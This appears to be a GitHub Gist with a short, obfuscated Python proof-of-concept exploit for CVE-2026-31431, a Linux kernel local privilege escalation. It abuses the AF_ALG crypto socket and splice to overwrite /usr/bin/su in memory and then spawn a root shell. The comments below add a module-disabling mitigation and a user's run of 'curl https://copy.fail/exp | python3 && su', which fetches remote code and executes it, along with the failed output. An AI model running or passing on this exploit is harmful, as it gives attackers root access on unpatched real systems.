Last active
April 30, 2026 05:35
-
-
Save ridwan-muhamad/74df4a2d89a4e6c51cc180101950c79c to your computer and use it in GitHub Desktop.
CVE-2026-31431 | copy.fail | xint.io/blog/copy-fail-linux-distributions
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import os as g,zlib,socket as s | |
| def d(x):return bytes.fromhex(x) | |
| def c(f,t,c): | |
| a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o) | |
| try:u.recv(8+t) | |
| except:0 | |
| f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) | |
| while i<len(e):c(f,i,e[i:i+4]);i+=4 | |
| g.system("su") |
Author
ridwan-muhamad
commented
Apr 30, 2026
PoC
Author
Quick Mitigation (No Reboot) !!
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
and it seemed to have mitigated the issue:
~$ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 11243 0 --:--:-- --:--:-- --:--:-- 11421
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment